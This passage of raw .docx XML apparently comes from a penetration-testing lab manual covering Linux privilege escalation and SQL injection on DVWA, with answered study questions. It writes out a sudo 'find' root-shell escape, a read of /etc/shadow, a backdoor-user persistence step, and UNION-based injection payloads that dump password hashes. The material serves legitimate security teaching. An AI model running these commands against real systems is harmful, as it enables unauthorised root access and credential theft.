          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Read the first three lines of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">head -3 /etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(Lab exercise only) create a confirmation backdoor user to demonstrate persistence capability, then remove it after the exercise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">□ Illustrative Output (not an actual captured run)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">$ sudo -l</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">User www-data may run the following commands:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    (root) NOPASSWD: /usr/bin/find</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">$ sudo find . -exec /bin/sh -p \;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># id</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation Questions — Answered</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q1. Why is giving a regular user sudo privileges to a text editor like vim a critical security mistake?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Full-screen editors like vim have a documented shell-escape feature (e.g. typing </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">:!/bin/sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> inside vim spawns a shell). If vim can be run via sudo, that spawned shell inherits root privileges — turning what looks like a narrow, harmless permission (“just edit this one config file”) into unrestricted root access. This exact technique, and many others, are catalogued on GTFOBins for a wide range of common Unix tools.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q2. What is the /etc/shadow file, and why does reading it represent a significant post-exploitation win?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">/etc/shadow stores password hashes and ageing data for every local account, and is readable only by root. Successfully reading it is direct, undeniable proof that root privilege escalation succeeded, and it also hands over every local account's hash for offline cracking (Practical 7), which may expose passwords reused on other systems or services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 5 — Web App Testing: SQL Injection on DVWA (Est. 5 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manually exploit SQL Injection at Low and Medium security levels on DVWA using Burp Suite; extract database contents.</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2144"/>
        <w:gridCol w:w="7602"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7602"/>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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Kali Linux; DVWA (e.g. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">http://&lt;target-ip&gt;/dvwa</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Burp Suite Community Edition, Firefox with FoxyProxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Log into DVWA, set Security Level to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Low</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, open the SQL Injection page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure FoxyProxy and Burp proxy listener; intercept a request to confirm the proxy chain works.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In the SQLi input field, submit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and observe the resulting database error — this confirms the injection point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine column count with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1' ORDER BY 2-- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1' ORDER BY 3-- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (error expected) to find 2 columns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Submit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1' UNION SELECT user, password FROM users-- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and record the returned usernames and MD5 hashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch Security Level to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; repeat the test via the URL — observe filtering; send the request to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Repeater</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, modify the raw POST body there, and confirm the bypass still works.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot: the error message, the UNION SELECT result with DB version, the users table dump, and the Burp Repeater Medium-bypass request/response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation Questions — Answered</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q1. The passwords you extracted are MD5 hashes. Why is MD5 insufficient for password storage? What should be used instead?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MD5 is fast to compute and has widely available precomputed rainbow tables for common passwords (for example the MD5 hash </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">5f4dcc3b5aa765d61d8327deb882cf99</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> is well-known to be the word “password”), so extracted hashes can often be reversed almost instantly. Slow, salted, purpose-built password hashing algorithms — bcrypt, scrypt or Argon2 — should be used instead.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
